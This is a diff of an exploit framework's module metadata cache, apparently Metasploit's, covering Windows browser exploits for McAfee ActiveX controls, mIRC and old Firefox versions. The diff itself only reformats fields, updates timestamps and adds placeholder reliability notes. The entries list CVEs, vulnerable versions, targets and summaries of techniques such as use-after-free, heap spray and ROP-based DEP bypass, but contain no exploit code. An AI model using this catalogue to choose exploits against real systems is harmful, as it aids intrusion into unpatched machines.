@@ -145856,9 +148708,7 @@
"exploit_windows/browser/mcafee_mvt_exec": {
"name": "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",
"fullname": "exploit/windows/browser/mcafee_mvt_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2012-04-30",
"type": "exploit",
@@ -145866,7 +148716,7 @@
"rgod",
"sinn3r "
],
- "description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.",
+ "description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.",
"references": [
"CVE-2012-4598",
"OSVDB-81657",
@@ -145876,16 +148726,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mcafee_mvt_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafee_mvt_exec",
@@ -145893,6 +148739,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145900,16 +148755,14 @@
"exploit_windows/browser/mcafeevisualtrace_tracetarget": {
"name": "McAfee Visual Trace ActiveX Control Buffer Overflow",
"fullname": "exploit/windows/browser/mcafeevisualtrace_tracetarget",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-07-07",
"type": "exploit",
"author": [
"MC "
],
- "description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.",
+ "description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2006-6707",
"OSVDB-32399",
@@ -145918,16 +148771,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows XP Pro SP2 English"
],
- "mod_time": "2023-03-23 10:19:30 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafeevisualtrace_tracetarget",
@@ -145935,6 +148784,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145942,16 +148800,14 @@
"exploit_windows/browser/mirc_irc_url": {
"name": "mIRC IRC URL Buffer Overflow",
"fullname": "exploit/windows/browser/mirc_irc_url",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2003-10-13",
"type": "exploit",
"author": [
"MC "
],
- "description": "This module exploits a stack buffer overflow in mIRC 6.1. By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.",
+ "description": "This module exploits a stack buffer overflow in mIRC 6.1. By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.",
"references": [
"CVE-2003-1336",
"OSVDB-2665",
@@ -145960,17 +148816,13 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mirc_irc_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/mirc_irc_url",
@@ -145978,6 +148830,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145985,9 +148846,7 @@
"exploit_windows/browser/mozilla_attribchildremoved": {
"name": "Firefox 8/9 AttributeChildRemoved() Use-After-Free",
"fullname": "exploit/windows/browser/mozilla_attribchildremoved",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
@@ -145996,7 +148855,7 @@
"Lincoln ",
"corelanc0d3r "
],
- "description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.",
+ "description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.",
"references": [
"CVE-2011-3659",
"OSVDB-78736",
@@ -146006,19 +148865,15 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Windows XP - Firefox 8 / 8.0.1",
"Windows XP - Firefox 9",
"Windows XP - Firefox 9.0.1"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_attribchildremoved.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_attribchildremoved",
@@ -146026,6 +148881,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146033,9 +148897,7 @@
"exploit_windows/browser/mozilla_firefox_onreadystatechange": {
"name": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free",
"fullname": "exploit/windows/browser/mozilla_firefox_onreadystatechange",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-06-25",
"type": "exploit",
@@ -146046,7 +148908,7 @@
"sinn3r ",
"juan vazquez "
],
- "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.",
+ "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.",
"references": [
"CVE-2013-1690",
"OSVDB-94584",
@@ -146060,16 +148922,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Firefox 17 & Firefox 21 / Windows XP SP3"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_firefox_onreadystatechange",
@@ -146077,6 +148935,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146084,9 +148951,7 @@
"exploit_windows/browser/mozilla_firefox_xmlserializer": {
"name": "Firefox XMLSerializer Use After Free",
"fullname": "exploit/windows/browser/mozilla_firefox_xmlserializer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-01-08",
"type": "exploit",
@@ -146094,7 +148959,7 @@
"regenrecht",
"juan vazquez "
],
- "description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.",
+ "description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.",
"references": [
"CVE-2013-0753",
"OSVDB-89021",
@@ -146106,16 +148971,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Firefox 17 / Windows XP SP3"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_firefox_xmlserializer",
@@ -146123,6 +148984,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146130,9 +149000,7 @@
"exploit_windows/browser/mozilla_interleaved_write": {
"name": "Mozilla Firefox Interleaved document.write/appendChild Memory Corruption",
"fullname": "exploit/windows/browser/mozilla_interleaved_write",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-10-25",
"type": "exploit",
@@ -146140,7 +149008,7 @@
"unknown",
"scriptjunkie"
],
- "description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.",
+ "description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.",
"references": [
"CVE-2010-3765",
"OSVDB-68905",
@@ -146152,16 +149020,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_interleaved_write.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_interleaved_write",
@@ -146169,6 +149033,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146176,9 +149049,7 @@
"exploit_windows/browser/mozilla_mchannel": {
"name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability",
"fullname": "exploit/windows/browser/mozilla_mchannel",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-05-10",
"type": "exploit",
@@ -146187,7 +149058,7 @@
"Rh0",
"mr_me "
],
- "description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,\n a windows 7 target was provided using JAVA 6 and below to avoid aslr.",
+ "description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,\n a windows 7 target was provided using JAVA 6 and below to avoid aslr.",
"references": [
"CVE-2011-0065",
"OSVDB-72085",
@@ -146197,18 +149068,14 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Firefox 3.6.16 on Windows XP SP3",
"Firefox 3.6.16 on Windows 7 + Java"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_mchannel.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_mchannel",
@@ -146216,6 +149083,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146223,9 +149099,7 @@
"exploit_windows/browser/mozilla_nssvgvalue": {
"name": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability",
"fullname": "exploit/windows/browser/mozilla_nssvgvalue",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
@@ -146234,7 +149108,7 @@
"Lincoln ",
"corelanc0d3r "
],
- "description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers), does not validate\n if a given index is out of bound. If a custom observer of nsSVGValue is created,\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.",
+ "description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers), does not validate\n if a given index is out of bound. If a custom observer of nsSVGValue is created,\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.",
"references": [
"CVE-2011-3658",
"OSVDB-77953",
@@ -146244,18 +149118,14 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Windows XP - Firefox 7",
"Windows XP - Firefox 8 (<= 8.0.1)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_nssvgvalue.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_nssvgvalue",
@@ -146263,6 +149133,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146270,9 +149149,7 @@
"exploit_windows/browser/mozilla_nstreerange": {
"name": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability",
"fullname": "exploit/windows/browser/mozilla_nstreerange",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-02-02",
"type": "exploit",
@@ -146280,7 +149157,7 @@
"regenrecht",
"xero"
],
- "description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.",
+ "description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.",
"references": [
"CVE-2011-0073",
"OSVDB-72087",
@@ -146292,12 +149169,8 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Auto (Direct attack against Windows XP, otherwise through Java, if enabled)",
"Firefox Runtime, fails with ASLR",
@@ -146305,7 +149178,7 @@
"Java JVM (20.1.0.02)",
"Java Regutils (6.0.260.3)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_nstreerange.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_nstreerange",
@@ -146313,6 +149186,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146320,9 +149202,7 @@
"exploit_windows/browser/mozilla_reduceright": {
"name": "Mozilla Firefox Array.reduceRight() Integer Overflow",
"fullname": "exploit/windows/browser/mozilla_reduceright",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-06-21",
"type": "exploit",
@@ -146335,7 +149215,7 @@
"mr_me ",
"TecR0c "
],
- "description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index being used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compare to a\n typical browser exploit) in order to gain control of the machine.",
+ "description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index being used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compare to a\n typical browser exploit) in order to gain control of the machine.",
"references": [
"CVE-2011-2371",
"OSVDB-73184",
@@ -146345,18 +149225,14 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Mozilla Firefox 3.6.16 (no JAVA)",
"Mozilla Firefox 3.6.16 (JAVA)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mozilla_reduceright.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_reduceright",
@@ -146364,6 +149240,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -146371,16 +149256,14 @@
"exploit_windows/browser/ms03_020_ie_objecttype": {
"name": "MS03-020 Microsoft Internet Explorer Object Type",
"fullname": "exploit/windows/browser/ms03_020_ie_objecttype",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2003-06-04",
"type": "exploit",
"author": [
"skape